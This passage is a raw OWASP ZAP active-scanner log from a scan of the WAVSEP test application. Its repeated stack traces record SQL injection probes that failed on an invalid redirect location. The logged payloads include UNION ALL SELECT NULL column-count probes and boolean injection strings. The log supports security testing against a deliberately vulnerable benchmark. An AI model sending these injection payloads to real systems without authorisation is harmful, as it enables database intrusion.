org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681029 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681030 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681031 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681032 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681032 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9681197 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 7275=2211 AND (1160=1160] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) AND 7275=2211 AND (1160=1160 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681198 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 8932=8932 AND (4548=4548] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) AND 8932=8932 AND (4548=4548 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681198 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 1691=6878 AND (6533=6533] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 1691=6878 AND (6533=6533 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681198 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 7275=2211 AND (1160=1160] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) AND 7275=2211 AND (1160=1160 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681199 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 7710=7710 AND (8106=8106] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 7710=7710 AND (8106=8106 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681200 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 1691=6878 AND (6533=6533] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 1691=6878 AND (6533=6533 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681201 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 2677=4286] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND 2677=4286 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681202 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 9617=9617] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND 9617=9617 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681202 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 2677=4286] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND 2677=4286 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681203 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 9438=1674 AND ('mOVb'='mOVb] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') AND 9438=1674 AND ('mOVb'='mOVb at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681206 [ZAP-ActiveScanner-1] 